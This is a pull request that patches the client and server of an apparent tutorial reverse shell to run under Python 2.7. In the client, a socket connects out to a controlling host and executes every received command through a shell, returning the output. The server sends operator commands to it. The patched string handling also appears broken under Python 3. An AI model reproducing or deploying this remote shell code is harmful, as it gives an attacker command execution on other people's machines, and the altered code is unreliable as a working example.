### PR TITLE
Python 2.7 compatability [fixed]

### DIFF
--- a/client.py
+++ b/client.py
@@ -15,7 +15,7 @@ while True:
     if len(data) > 0:
         cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
         output_bytes = cmd.stdout.read() + cmd.stderr.read()
-        output_str = str(output_bytes, "utf-8")
+        output_str = str(output_bytes).encode('utf-8')
         s.send(str.encode(output_str + str(os.getcwd()) + '> '))
         print(output_str)
 

--- a/client.py
+++ b/client.py
@@ -10,7 +10,7 @@ s.connect((host, port))
 
 while True:
     data = s.recv(1024)
-    if data[:2].decode("utf-8") == 'cd':
+    if data[:2].decode("utf-8") == 'cd' and data[3:].decode("utf-8") != "":
         os.chdir(data[3:].decode("utf-8"))
     if len(data) > 0:
         cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

--- a/server.py
+++ b/server.py
@@ -40,7 +40,10 @@ def socket_accept():
 # Send commands
 def send_commands(conn):
     while True:
-        cmd = input()
+        if sys.version_info[0] == 3:
+            cmd = input()
+        else:
+            cmd = raw_input()
         if cmd == 'quit':
             conn.close()
             s.close()

--- a/server.py
+++ b/server.py
@@ -47,8 +47,8 @@ def send_commands(conn):
             sys.exit()
         if len(str.encode(cmd)) > 0:
             conn.send(str.encode(cmd))
-            client_response = str(conn.recv(1024), "utf-8")
-            print(client_response, end="")
+            client_response = str(conn.recv(1024)).encode('utf-8')
+            print(client_response)
 
 
 def main():


### PR DESCRIPTION
I made your tutorial python 2.7 compatible, and as a added bonus prevented calling os.chdir() with an empty string crashing the client. 
